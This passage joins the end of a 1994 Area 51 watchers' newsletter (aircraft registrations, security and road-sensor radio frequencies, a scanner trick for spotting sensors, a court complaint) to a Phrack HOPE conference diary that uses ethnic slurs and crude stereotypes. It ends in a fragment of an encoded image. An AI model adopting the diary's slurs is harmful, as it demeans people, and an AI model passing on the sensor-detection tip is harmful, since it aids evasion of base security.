jets that shuttle workers to Groom and Tonopah.  That operation 
has supposedly been taken over by the Air Force, using the same 
aircraft and possibly the same staff.

 ----- JANET "N" NUMBERS -----

For aircraft watchers, here are the registration and serial 
numbers of Janet 737s and Gulfstream commuter planes spotted at 
the Janet terminal at McCarran airport.  Based on observations in 
5/94 and the 4/30/94 FAA registry.  One or more of the Janet 
aircraft are probably missing from this list.  (We ask our readers 
to find them.)

Boeing 737...
Reg. #/Serial #/Owner
N4508W  19605  Great Western Capital Corp, Beverly Hills
N4510W  19607  Great Western Capital Corp, Beverly Hills
N4515W  19612  Great Western Capital Corp, Beverly Hills
N4529W  20785  First Security Bank of Utah, Salt Lake City
N5175U  20689  Dept. of the Air Force, Clearfield UT
N5176Y  20692  Dept. of the Air Force, Clearfield UT
N5177C  20693  Dept. of the Air Force, Clearfield UT

Gulfstream C-12...
N20RA   UB-42  Dept. of the Air Force, Clearfield UT
N654BA  BL-54  Dept. of the Air Force, Clearfield UT
N661BA  BL-61  Dept. of the Air Force, Clearfield UT
N662BA  BL-62  Dept. of the Air Force, Clearfield UT

 ----- JANET HANDOFF FREQUENCIES ----

A DESERT RAT EXCLUSIVE!  Published here for the first time are the 
air traffic control frequencies for the "Janet" 737 crew flights 
from Las Vegas McCarran Airport to Groom.  The McCarran freqs are 
public, but the Groom ones have not been revealed until now.  Air 
traffic control broadcasts are "in the clear" and any scanner 
radio should be able to pick them up.  Each of these freqs has 
been personally confirmed by Psychospy or a close associate.

121.9   McCarran Ground Control
119.9   McCarran Tower
133.95  Departure Control
119.35  Nellis Control
120.35  Groom Approach
127.65  Groom Tower
118.45  Groom Ground

Here are some other Groom freqs (some of which were previously 
reported in DR #8).  The security frequencies are usually 
scrambled, but not always.

418.05  Cammo Dudes (primary)
408.4   Cammo Dudes (repeat of 418.05)
142.2   Cammo Dudes
170.5   Cammo Dudes (Channel 3)
138.3   "Adjustment Net" (seems related to security)
261.1   Dreamland Control (published)
255.5   Groom Tower (repeat of 127.65)
154.86  Lincoln County Sheriff
496.25  Road sensors on public land
410.8   Pager (apparently from Groom but unconfirmed)

The most accurate way to detect a road sensor (AFTER you have 
tripped it), is to program 496.25 into several channels of your 
scanner, then scan those channels exclusively as you are driving.  
When the scanner stops on one channel, you have just passed a 
sensor.

 ----- GROOMSTOCK '94 -----

The "Freedom Ridge Free Speech Encampment" went pretty much as 
planned, with at least sixty people in attendance but not all of 
them staying for the night.  There were no surprises and, sadly, 
no confrontations with the authorities when we whipped out our 
cameras and pseudo-cameras to point at the secret base.  The Cammo 
Dudes were visible but kept their distance, and the only authority 
figure to show up on the ridge was a BLM Ranger in a Smoky-the-
Bear hat.  He was concerned only that we clean up our trash, and 
he warned us, by his very presence, that "Only You Can Prevent 
Forest Fires."

The event was recorded in an 8/29 article in the Las Vegas Review-
Journal, which dubbed it "Groomstock."  [The article may be 
available at the FTP site.]  We were disturbed to read in the 
paper that the attendees included some "marijuana-smoking 
slackers."  We called around and found out it was true and that it 
happened after Psychospy went to bed.  Had we known, we would have 
quashed it immediately.  This sort of thing discredits our ability 
to police ourselves and hurts the reputation of the land grab 
opponents.

The hot gossip around the campfire was about the Review-Journal 
reporter and the loony in the tie-dyed shirt.  The loony had spent 
about an hour moving rocks and dirt around to make himself a 
comfortable bed, then he blew a conk-shell horn and banged cymbals 
together to bless it.  When the reporter arrived, he volunteered 
to make a bed for her, too, not far from his own, and he proceeded 
with the project without any encouragement.  It is unknown why he 
singled her out for this special honor, but evidently she was 
"chosen."  It should be noted, however, that while blessing the 
reporter's bed, the loony accidentally dropped one of the cymbals.  
We forget to check with the reporter in the morning to see if that 
omen affected the quality of her nighttime experience.

 ----- SOUND FAMILIAR? -----

From an AP news story printed in the 8/5 Review-Journal...

   "PORT-AU-PRINCE, Haiti -- Authorities deported an American TV 
crew Thursday, putting the three journalists in an open pickup 
truck, parading them through the capital and then dumping them at 
the Dominican border....

   "Soldiers detained the freelance journalists for PBS's 'The 
MacNeil/Lehrer Newshour' on Sunday while they were filming at 
Port-au-Prince's airport.  Three of their videotapes were 
seized....

   "The military-backed government has urged journalists not to 
report 'alarmist' news and has attempted to restrict news 
coverage....

   "'I think it's deplorable, and it's obviously an attempt to 
embarrass them,' [U.S.] Embassy spokesman Stanley Schrager told 
The Associated Press.  'This treatment was not necessary; neither 
was the deportation....  It's a transparent attempt by this 
illegal regime to interfere with the free flow of information.'"

In related news, the four of the five video tapes seized on July 
19 from KNBC-TV have still not been returned.  The tapes were 
taken without a warrant after the crew filmed an interview on 
Freedom Ridge but not the Groom base itself.  Activist Glenn 
Campbell, who accompanied the crew, was arrested when he attempted 
to interfere with this seizure.

 ----- CAMPBELL ARRAIGNED -----

Activist Glenn Campbell reports that his Aug. 24 arraignment on 
obstruction charges was "amicable."  Charges were presented, but 
the District Attorney did not appear.  The complete text of the 
charges, stemming from the July 19 KNBC incident, reads as 
follows...

 ---

Case No. P55-94

IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP
IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA

CRIMINAL COMPLAINT

STATE OF NEVADA, Plaintiff,
 vs.
GLENN P. CAMPBELL, Defendant.

STATE OF NEVADA    ) ss.
County of Lincoln  )

DOUG LAMOREAUX, being first duly sworn and under penalty of 
perjury, personally appeared before me and complained that on or 
about the 19th of July, 1994, in Lincoln County, State of Nevada, 
the above-named Defendant, GLENN P. CAMPBELL, committed the 
following crime:

COUNT 1

OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC 
1.12.010, a MISDEMEANOR, in the following manner:

The Defendant did, then and there, after due notice, willfully, 
hinder, delay or obstruct a public officer in the discharge of his 
officer powers or duties.  Specifically, the Defendant did, then 
and there, after due notice, willfully hinder Sergeant Doug 
Lamoreaux in the discharge of his official duties by locking the 
doors of the vehicle which Sergeant Lamoreaux was retrieving 
certain items from and further refused to unlock the doors after 
being requested to do so by Sergeant Lamoreaux.

All of which is contrary to the form of Statute in such cases made 
and provided and against the peace and dignity of the State of 
Nevada.  The complainant, therefore, prays that a Warrant be 
issued for the arrest of the Defendant, if not already arrested, 
so that he may be dealt with according to law.

 [Signed]
 DOUG LAMOREAUX
 Sergeant
 Lincoln County Sheriff's Department

SUBSCRIBED and SWORN to before me
this 24th day of August, 1994
[Signed] NOLA HOLTON
NOTARY PUBLIC/JUSTICE OF THE PEACE

 ---

The only surprise in these charges is the line "and further 
refused to unlock the doors after being requested to do so by 
Sergeant Lamoreaux."  That is not how Campbell recalls the 
incident.  DR#12, published less than 12 hours after the incident, 
reported it as follows...

   "At this point Campbell, who had been standing on the opposite 
side of the vehicle, reached in and pushed down the door locks on 
the side that Lamoreaux was approaching.

   "Lamoreaux said, 'You're under arrest.'  Campbell was 
immediately handcuffed and placed in Deputy Bryant's vehicle."

Campbell claims that Lamoreaux said, "You're under arrest," 
IMMEDIATELY after he pushed down the door locks, with no request 
being made to unlock them.  Campbell says he has two other 
witnesses, the KNBC crew, who can verify his story.  In this case, 
where the basic recollection of facts is in conflict, it will be 
interesting to see what the second officer, Deputy Kelly Bryant, 
will say under oath.

However, the core of Campbell's defense rests on Constitutional 
issues.  He is guilty of obstruction only if the officer was 
indeed engaged in the "lawful" execution of his duties.  Lamoreaux 
justified his warrantless search by citing, in vague terms, a 
certain Supreme Court ruling, the name of which he could not 
recall at the time.  That ruling is apparently in the case "Ross 
vs. U.S." which allows the warrantless seizure of "contraband" 
from a vehicle when there is a danger of flight.  It is unclear at 
this point whether the video tapes of a news crew constitute 
contraband in the same manner as a shipment of marijuana or stolen 
merchandise.  Complex First Amendment issues may be invoked.  The 
case may be further complicated by the repeated offer by the TV 
reporter to allow Lamoreaux to view the video tapes himself.

Campbell has requested, and has been granted, a jury trial.  
According to the Justice, this will be the first jury trial held 
in this court since about 1987.  Campbell announced his intention 
to represent himself at the trial, with possible legal co-council.  
A tentative trial date of Oct. 25 has been set, but it is likely 
to be postponed.  Campbell indicated that he will waive his right 
to a trial within 60 days to allow more time to conduct legal 
research.

 ----- LARRY KING NOT CLONED? -----

Our report in DR#13 about the diversion of Larry King's plane to 
Nellis AFB continues to disturb many of our readers.  It raises 
the specter of secret contacts between King and the military or 
even a surreptitious replacement of the talk show host by a look-
alike clone.  Now, we wonder if our panic was only a false alarm.  

A producer from a Las Vegas TV station tells us:  "I checked into 
it and think it is legit.  According to the FAA, McCarran Airport 
was never really closed, but they did have pilots choose not to 
land on that Saturday afternoon because of inclement weather.  
They also confirm that there is an agreement with Nellis to allow 
planes in trouble to land there.  I spoke to the control tower at 
McCarran.  They checked their records, and they indicate that on 
that Saturday a nasty thunderstorm was noted by the tower at 1:45-
2:05.  In fact, four takeoffs were delayed during that time due to 
weather.  Planes in the air just flew holding patterns until the 
weather cleared."  

Presumably, King's plane didn't have enough fuel to maintain the 
holding pattern.  Thunderstorms can be very localized, and perhaps 
Nellis was clear.  A producer at Larry King Live says that, in her 
opinion, he is definitely the same Larry King.  She says he got 
the military escort because he was late for a speaking engagement 
and made his wants known on the plane.  

So what can we say?  Obviously, the FAA, the TV station and the 
King producer ARE PARTIES TO THE CONSPIRACY.  This story is deeper 
than it seems, and the Rat will pursue the investigation for as 
long as it takes.  THE TRUTH IS OUT THERE.

 ----- MYSTERIOUS SIGN DISAPPEARANCE -----

The big "No Photography" signs on the Groom Lake Road have 
disappeared.  For over a year, they were installed on public land 
about two miles from the military border, but sometime in the 
first week of August they were cleanly removed, posts and all, 
apparently by the Air Force.  (A civilian thief--like SDM, who has 
a number of these signs in his possession--would have simply 
unscrewed the signs, not uprooted the heavy posts and carefully 
filled up the holes.)  The two signs on either side of the road 
were each about 3 feet by 4 feet and bore the following text:

WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.  
IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE, 
DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR 
FLYING OVER THIS INSTALLATION.  IT IS UNLAWFUL TO REPRODUCE, 
PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH, 
PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR 
EQUIPMENT AT OR FLYING OVER THIS INSTALLATION.  VIOLATION OF 
EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR 
IMPRISONMENT FOR UP TO ONE YEAR.  18 U.S. CODE SEC. 795/797 AND 
EXECUTIVE ORDER 10104.  FOR INFORMATION CONTACT:
   USAF/DOE LIAISON OFFICE
   PO BOX 98518
   LAS VEGAS, NV 89193-8518

The signs first appeared in May 1993 shortly after WFAA-TV from 
Dallas took video of the base from White Sides.  (When challenged 
by the Sheriff, they admitted photographing the base but managed 
to retain their tape.)  The signs were removed in Aug. 1994 
shortly after KNBC-TV from Los Angeles lost their video tape after 
NOT photographing the base.  It is unclear why the AF removed the 
signs.  Perhaps they have become a little smarter and are adopting 
a "don't ask, don't tell" policy toward photography (but we 
wouldn't want to be the ones to test that theory).  The signs 
themselves had become a tourist attraction, and no visitor could 
resist having their picture taken beside them.

At the same time the "No Photography" signs vanished, the 
misplaced "Restricted Area" sign also went away.  This is the 
crossed out sign seen in the NYT article, where the "stupid 
faggot" comment had later been written and then erased (DR#12,13).  
God, we'll miss that sign!  It was as illegal as hell--being on 
public land--but an old friend to us nonetheless.

At least now we can assure the public:  If you see a Restricted 
Area sign, it's real and they mean it.

 ----- INTEL BITTIES -----

ENCOUNTERS TRANSCRIPT.  Complete, unedited transcripts (not just 
the sound bites) of the interviews in the 7/22 Encounters show 
(DR#10) are available to Compuserve users.  Type GO ENCOUNTERS, 
and look under "Browse Libraries" and "Interview Transcripts."  
Interviews include Rep. James Bilbray (file FREED2.105), Agent X 
(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105).  This 
is a transcript for video editing, so every "Um" and "Ah" is 
recorded.

NEW GUARD FACILITY.  We send our congrats to the Dudes on their 
newly constructed prefab building next to the guard house on Groom 
Lake Road (about a half mile inside the border).  Apparently, they 
are expecting more business along this part of the border and need 
a new substation.  Interested taxpayers can view the new building 
from the first hill on the hiking trail to F.R. ("Hawkeye Hill"), 
a location that will continue to be public even if F.R. is taken.

UPCOMING TV SEGMENTS.  UNSOLVED MYSTERIES will broadcast a show on 
UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm.  The 
broadcast will include a new interview with Bob Lazar.  THE 
CRUSADERS will broadcast a segment on UFOs, including a visit to 
F.R., on Sept. 10 or 11 (date and time vary by city).  Air date 
for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been 
confirmed, but it could be the week of Sept. 12.

 ===== SUBSCRIPTION AND COPYRIGHT INFO =====

(c) Glenn Campbell, 1994.  (psychospy@aol.com)

This newsletter is copyrighted and may not be reproduced without 
permission.  PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING:  For 
one year following the date of publication, you may photocopy this 
text or send or post this document electronically to anyone who 
you think might be interested, provided you do it without charge.  
You may only copy or send this document in unaltered form and in 
its entirety, not as partial excerpts (except brief quotes for 
review purposes).  After one year, no further reproduction of this 
document is allowed without permission.

Email subscriptions to this newsletter are available free of 
charge.  To subscribe (or unsubscribe), send a message to 
psychospy@aol.com.  Subscriptions are also available by regular 
mail for $15 per 10 issues, postpaid to anywhere in the world.

A catalog that includes the "Area 51 Viewer's Guide", the Groom 
Lake patch and hat and many related publications is available upon 
request by email or regular mail.

Back issues are available on various bulletin boards and by 
internet FTP to ftp.shell.portal.com, directory 
/pub/trader/secrecy/psychospy.  Also available by WWW to
http://alfred1.u.washington.edu:8080/~roland/rat/desert_rat_index.
html

Current circulation: 1440 copies sent directly to subscribers 
(plus an unknown number of postings and redistributions).

The mail address for Psychospy, Glenn Campbell, Secrecy Oversight 
Council, Area 51 Research Center, Groom Lake Desert Rat and 
countless other ephemeral entities is:
     HCR Box 38
     Rachel, NV 89001 USA

###


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 22 of 28

****************************************************************************

                                     HOPE
                                      by
                                 Erik Bloodaxe

I was a little apprehensive about going to HOPE.  I'd been warned for months
that "If you go to HOPE, you are going home in a body bag," and "I am
going to kick your fucking ass at hope," and "If you go, you're gonna get
shot."

Needless to say I found this a bit unnerving.  As big an ego as I may have,
it still does not repel hot lead projectiles.  Add this to the fact that my
best friend of 10 years was murdered by some random idiot with a pistol in
fucking pissant, Bible-thumping Waco, TX a few months back.  Waco.  And the
shooter wasn't even a Davidian, just a drugged-out 16 year-old.  If the
kids pack heat in Waco, I know they must come standard issue in New York.

But, hell, I've haven't missed a con in ages.  Could I actually miss
a SummerCon?  Especially the SummerCon commemorating the 10th
anniversary of 2600 Magazine?  Could I?

Like an idiot, I make my reservations.  Ice-9, who was stuck with a
leftover ticket on United, traded it in and we were both off to New York.

We arrived late Friday night.  So there we were:  The Big Apple, Metropolis,
The City that Never Sleeps.  Unfortunately, it never showers or changes
its clothes either.  Why anyone in their right mind would want to come
to New York City boggles the mind.  It sucks.  I mean, I've been damn
near everywhere in the United States, I've been to major cities in Mexico,
Canada and Europe, and New York is by far and away the worst fucking
shithole I've seen yet.  I don't know for certain, but Port au Prince
probably has more redeeming qualities.

I figured out within a few minutes why New Yorkers are such assholes too.
First, no one seems to be from New York exactly, merely transplants from
somewhere else.  So what has happened is that they bought into New York's
superb public relations campaign and sold off all their belongings to get
their ticket to America and the land of opportunities.  So, they find
themselves in NYC with about half a billion other broke, disillusioned
immigrants wading in their own filth, growing very pissed off at being sold
such a bill of goods.

It would piss me off too.  And I'm sure our cab driver that night missed his
family's ancestral thatched hut back in good old Bangladesh.  But luckily for
him crack provides a good short-term solution.  Not to mention excellent
motor skills.

Twenty-five near misses, and a lengthy carhorn symphony later, we managed to
arrive at the Hotel Pennsylvania intact.  The hotel, heralded in legend and
lore had seen better decades.  About the only thing it had going for it was
one of the oldest phone numbers in the city.  PEnnsylvania 6-5000.
(Ta-da-dum-dum)  I think if Glen Miller were alive today, his band members
would kick his ass if he told them they had to sleep there.

For a hundred dollars a night, Ice-9 and I were treated to two less than
jail-house sized beds, a tv that almost worked, and a hardwired telephone
(ie:  no modular jacks in sight.)  In addition, the entire room was stained
from floor to ceiling, and most of the wall paper by the window had peeled
halfway down.  The window itself opened to a miraculous view of the trash
12 floors down.  We debated on throwing every single object in the room
out the window for a little excitement, but decided it might injure some of
the homeless below.

Anxious to get the hell out of our little cell (well, the prisons I've had
the misfortune to sleep in were in better repair) Ice-9 and I took off to
the top floor and the HOPE conference area.

I don't know why Emmanuel decided to call this conference "Hackers On Planet
Earth."  This conference had more right to the title "Hacking at the End
of the Universe."  Perhaps even "Hacking in the Cesspool of the Earth."
HEU was in the middle of nowhere, but it was pretty and happy.  It should have
been called HOPE.

In fact, as the days went on, I noticed a number of similarities between
HOPE and HEU:

        1.  Both heavily orchestrated by 2600 and Hack-Tic
        2.  Both had in-house networks
        3.  Both had token "fed" speakers
        4.  Both had seminars on boxing, pagers, social engineering, history,
            UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
        5.  Both drew extensive press attendees
        6.  Both charged more than any other conferences.  (HOPE 25, HEU 50)
        7.  Both had over a thousand attendees
        8.  Both used computer equipment to make photo badges
        9.  Both tried far too hard to be technical
       10.  New York used to be New Amsterdam

But I digress...

Anyway, the network room was beginning to shape up quite nicely.  Young
hacklets were already clicking away at their keyboards, oblivious to
anything else save their screens.  Why anyone would travel all the way to
New York to sit in front of a screen and type all by their lonesome
left me stymied.  Isn't that what we all do back at home?

The first people we ran into were Winn Schwartau and Bootleg.  I could
be wrong, but I think a large factor in Winn's showing up at HOPE was
to watch me get shot and write about it.  He told me his article would
be titled, "Cyber-Christ gets nailed to the Cross."  Bootleg, however, was
here to raise a little hell.  And goddamnit, so were we!

Hacker conferences have always been an excuse for people who only knew
each other over the phone and over the networks to actually meet face to
face and hang out.  Anyone who tells you "Conferences today suck, there isn't
enough technical inpho," is a clueless fuck.  You do not go to a conference
expecting to learn anything.  If you don't already know, chances are pretty
damn good that the people who do won't tell you.  You learn by doing, not by
sitting in an audience at some hacker con.  Get a beer, make some new friends,
and THEN maybe you might pick up something in casual conversation, but at
least you will have a good time getting sloshed with new people who share
common interests.  The only people who will learn something from
hacker conferences are journalists who will then go on to write even
more scathing sensationalist pieces about how hackers will destroy
your credit and eavesdrop on your phone.  Is that what we really
want?

Me, Ice-9, Bootleg, Bootleg's friend from Oregon, and Thomas Icom took off
to drink and see what debauchery lay waiting for us in Times Square.
(Yes, it was a very, very, very mismatched looking group.)  Icom, armed
with ever-present handheld scanner, kept a continual broadcast of NYPD's
latest exploits.

We ended up hanging out on the fringes of Times Square at some sidewalk
deli bullshitting about anything and everything.  A recurring topic throughout
the whole weekend was EMP and HERF weaponry.  I don't particularly know
if anyone in the underground would more excited by setting off one of these
devices, or merely being able to brag to everyone that they were in possession
of one.

We sat talking about the ramifications of setting off some such device on
the roof of the building we were sitting in front of.  The thought of
all the neon and electronics surrounding us simultaneously ceasing to
function and imploding at the logic gate level provided for at least an
hour of hacker masturbation material.  Bootleg reminisced about trying to
track down decommissioned military radar equipment back in the early 80's
for just such a project.  "I'm surprised it's taken this long for the
underground to get up on this stuff," he said.

As we headed back to the hotel, we passed by the coolest vehicle ever
seen by hacker eyes.  The 2600 van was an exact replica of a NYNEX
van, with the subtle addition of the magazines moniker instead of
NYNEX, and a ball-capped hack-type tapping away on a notebook computer,
plugged into the bell logo.  It was truly a sight to behold.  I began
to drool.  All Phrack has is a beat up, red Toyota Corolla.

Up in the network room those that were not deeply engrossed in hacking
the hope.net linux box were either already plowed (Hi Torquie!) or about
to be.

It was late, so we decided to crash.

Ice-9 and I managed to wake up at a reasonable hour, and took off to
see the city.  I had seen an electronics store the night before, and
had been looking for a PAL-NTSC-SECAM VCR for ages.  I found it.
New York's only saving grace (well, except the huge amount of
businesses there all screaming for security work) was cheap consumer
electronics.  For 380 bucks I got a VCR that not only converted on the
fly between any tape format, but also had a digital freeze frame
for those elusive screen captures.  I was stoked.

After some food, we headed back up to the conference.  The buzz was
someone had several hundred cell phones confiscated by Cellular One
reps after he off-handedly remarked that he would clone them
to a potential buyer.  I then ran into two of my friends from WAY back
in the early 80's:  Tuc and Agrajag.  Ag is an amazing guy.  Not only
was he fantastic way back then, he went on to write UNIX for Commodore,
pull stints at places like USL, and is now working with speech
recognition and wireless networking.  Yet another fine example of
those ne'er-do-well Legion of Doom guys the government always
frowned upon.  Right.

Later that afternoon, as I'm talking to someone in the network room, I feel
someone bump into me.  "Oh, sorry," says the person, and I go on with my
conversation.  A few seconds later, it happens again.  Same guy, same
"Oh, sorry."  When it happens a third time I shove the guy back, and
say, "Man, what the hell is your problem."  Mistake.  I look up straight
into the eyes of a guy about 7 feet tall and 2 feet wide.  Well, I'm
exaggerating but it sure seemed that way at the time.  All of a sudden
I am an extra in the Puerto Rican version of "Of Mice and Men."
"De Ratones Y Hombres"

The first guy was about 5 feet tall, and scurried around within an arms
reach of the big guy.  Immediately I realize that if I do ANYTHING, this
big dude is more than ready to fuck me up, so the little guy must be a
diversion.  The big guy grunts and begins to maneuver around me.
The little guy then takes his cue and begins pushing me, all the while
asking "What's your name?  What's your handle?"  I keep backing up keeping
an eye on the big guy, who is staring daggers at me.  Well, at least with
his one good eye.  His lazy eye, stared daggers at the wall, the carpet,
and a few other places.

Meanwhile, this little event has gathered the interest of many in the con.
People began to gather around to see Erik Bloodaxe finally get beat down.
Unfortunately for the would-be spectators, several others tried to intervene.
Tuc and a few of the other larger attendees went up to the big guy and
attempted to hold him back.  This only succeeded in him letting out a
roar-like sound as he shrugged them off and continued coming towards me.

Finally, I say to the little guy, who has been engaging me in what was
basically the equivalent of the mosh pit at a Barry Manilow concert,
(One fucked up guy running into people who don't want to play his game)
"I'm Chris Goggans, who the hell are you?"  To which he yells, "I'M JULIO!"

Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was
raided by the FBI and Secret Service some years back.  While all
his MOD brethren served jail time, Julio worked out a deal with the
prosecutors in which he sold out his friends by agreeing to provide
state's evidence against them should the cases go to court.

And I'm the bad guy?

Fuck, all I ever did was try to keep my business running free of
interruptions from disgruntled, jealous teenagers.  I never turned state's
evidence against my best friends to save my own ass.  What am I, Agent Steal?

At this point everyone rushed in-between us and whisked Julio and his
lazy-eyed, neandrethal boyfriend out the door.  (Notice, I can call him
all kinds of names now, because I'm back home in Austin, several thousand
miles away.)  I still have no idea who the big guy was.

From now on, those of you who sincerely want to kick my ass, have the
nerve to do it by yourself.  I mean, I only went as far up as green in
Tae Kwan Do, but that was far enough to learn the sacred truth, "Never
take on more than ONE person or you will get the shit kicked out of you."
Leave your boyfriends at home and be a man.  If I have the balls to
go thousands of miles away from home an enter the DMZ expecting to get
shot, then you should have the balls enough to do something on your own.
And remember:  take the first swing.

Shortly after "the incident" as it came to be called, by everyone who
approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele
took off to find food.  Steele decided we needed female accompaniment,
so he invited a reporter from Details.  She brought along her camera crew,
who had been taking so many pictures around the con, one would think
they owned Polaroid stock.

Robert Steele is an interesting character.  After a 20 year CIA tour he went
on to found Open Source Solutions, a beltway operation that uses public
sources of information to build intelligence dossiers.  He described
himself as "a short, fat, balding old-guy."  This is like Rush Limbaugh
calling himself "a harmless, loveable little fuzzball."  Their self-image
is a bit removed from reality.  Steele carries himself with the air of
a spy.  It's kind of hard to explain, but it would be easy to see Steele
excusing himself from dinner, killing three guys in the alley, and coming
back for a piece of apple pie without an accelerated heartbeat or breaking
a sweat.

On top of being so immersed in the spy game, and having been in charge of
the design and implementation of the CIA's data center, Steele takes the
severely radical viewpoint that hackers are America's most valuable
resource, and should be put to productive use rather than jailed.  This
man needs to come to more cons.

Dinner was odd to say the least.  The media people sat together, somewhat
removed from us.  They said approximately 5 words to us the whole time,
possibly feeling somewhat bored by our drunken computer revelry.
The reporter seemed visibly disturbed by all of us, and the guys
looked like they would be more comfortable sitting in a coffee shop
listening to Tom Waits while having a hearty debate over "Freud vs. Jung."

Our discussions got louder and louder as the scotch flowed, and
by the end of the evening most of the restaurant had heard such topics
as "The CIA does most of its recruitment in the Mormon church," and
"licking the floor at a Times Square peep show."  By the time the check
came the Details people were more than happy to pay more than their share
of the bill to get the hell out of Dodge.  A word of advice:  always
get separate checks when dining out with any of us.

Back in the hood, everyone was milling about waiting for the
History of 2600 panel to begin.  There was some kind of problem with
one of the displays, so people were beginning to grow restless.  Right
about then one of the best looking girls at the con wandered by.  Taking
a guess, I asked her, "Are you Morgen?"  She was.  It's almost unbelievable
that someone who would waste time hanging out on IRC and who can actually
interview for highly technical jobs could look like this.

Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to
get drunk, all of them rather disgusted by the regular con attendees.
They invited me, so I tracked down Ice-9, who by that time was so ready
for a pint of Guiness you could almost see the Harp Logo showing up
on his skin like drunken stigmata.

We ended up across the street at a little pub called the Blarney Rock.
Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots
went down like Mexican whores.  Everyone was in agreement that this
was the best time any of us had experienced  at HOPE.  In between everyone
drinking, and leering at Morgen, we actually talked about hacking stuff too.
Gee, and we weren't even on a panel!

As the night progressed, almost everyone from the con ended up at the Blarney
Rock.  The con took the place over.  The Blarney Rock probably made
more money that night than they had any night in recent history.
Everyone actually mingled, talked, planned and plotted.  Plans were thrown
around for the next PumpCon (Boston?), everyone talked about "the time
they were busted the first time," Steele showed up wearing a Chinese
Communist Cap, Fusion cursed at passers by in Korean and almost started
an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend's
Fallon-esque ability (much to the shock and envy of everyone listening),
Count0 told his decapitated dog story, and there was much rejoicing.  (YAY!)

As the night went on, Ice-9 and I decided now was the time to actually
check out the seedy underbelly of Times Square.  At 1:00 in the evening.
Alone.  Drunk.  Wide-eyed out-of-towners staggering up side streets in
one of New York City's sleaziest areas.

Within a few minutes of hitting 42nd and 7th, we were approached by a
street hustler.  "Yo, what you need?  Crack?  Smoke?  H?  You like young
girls?  What you need, mah man?"  Ice-9, in his drunken glory, "Yo man,
you don't know who the fuck you're dealing with!  I'm the biggest fucking
felon in the whole goddamn world.  You don't have shit that I couldn't
get, and probably don't already have."  The hustler took a double-take
and said, "Yo, I likes your style."  Ice replied, "You damn Skippy!"

Shortly thereafter, another hustler showed up.  "Yo man, you want crack?
I got the rock right here."  Ice looked at him and said, "Man, if I smoke
any more crack tonight, I'm going to fucking explode."  The dealer went
away fast.

Times Square isn't quite as sleazy as it's made out to be actually.
I've been in worse.  It does, however, have the most extensive and
cheapest collection of European smut this side of Copenhagen.  In fact,
the same movies from Holland would have cost 40 American dollars more in
Holland than they did in New York.  Beyond that, Times Square had little
to offer anyone.  That is, unless you wanted to spend a buck in a
really sleazy peep show to grope some crack whore.  I think not.

Somehow, we made it back to the Blarney Rock alive, only to find that they
had kicked everyone out.  We headed back to our cell and passed out.

The next morning, I came to early and wandered around the hotel.  The second
floor had caught on fire recently, and one wing was completely
barbecued.  All the gutted rooms were unlocked and the phones worked.
God only knows why people weren't using these rooms as squatter's pads,
considering how broke most hackers are.

The main ballroom in the hotel was very cool.  It was easy to see how
at one point in time the Pennsylvania was quite a sight to behold.
I suppose it was much like New York itself in that respect:  Once
a marvel of the modern world, now a festering sore crying out for
a good cleaning and some antibiotic.

We left New York at noon that day, and did not even get the chance to
see the numerous panels scheduled for that day.  With my complete absence
from any panel it's doubtful I would have made it anyway.

-----------------------------------------------------------------------------

So, did I like HOPE?  Yes.  I like cons for what they should be:
a chance to hang out in person with your idiot online friends.  Hackers
are an odd bunch.  We are all basically a bunch of self-involved,
egomaniacal, borderline-criminal attention-seekers.  Rarely, if ever,
can we expect to meet anyone stupid enough to share our interests.
Normal citizens, with whom most of us share absolutely no common frame
of reference, look at us as if we were Martians.  Even those
computer-literate folk who talk geekspeak and understand most of
what we are saying are left in the dark when we begin babbling
about breaking into anything.

Collectively, we are all fools, and without the opportunities of
any social interaction with our peers, we will all fall prey to fear,
uncertainty and doubt regarding each other.  We had the social aspect
many years ago in the early 80's with the proliferation of BBSes and
teleconferences.  Now, much of that interaction is lost.  Compared to
our subculture's "Golden Age," the teleconferences and BBSes that exist
today are a pale reflection of the ones of yesterday.  All we have is
the inane banter provided by IRC and the occasional con.

Our only hope is each other.

See you all at Summercon 1995 - Atlanta, Georgia.

-----------------------------------------------------------------------------

begin 644 2600VAN.JPG
M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
M_]L`A``%`P,$`P,%!`0$!04%!@<,"`<'!P</"PL)#!(0$Q,2$!$1%!<=&!05S
M&Q81$1DB&1L>'R`A(!,8)"8C("8=("`?`04%!0<&!P\("`\?%1$5'Q\?'Q\?4
M'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q__`
MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
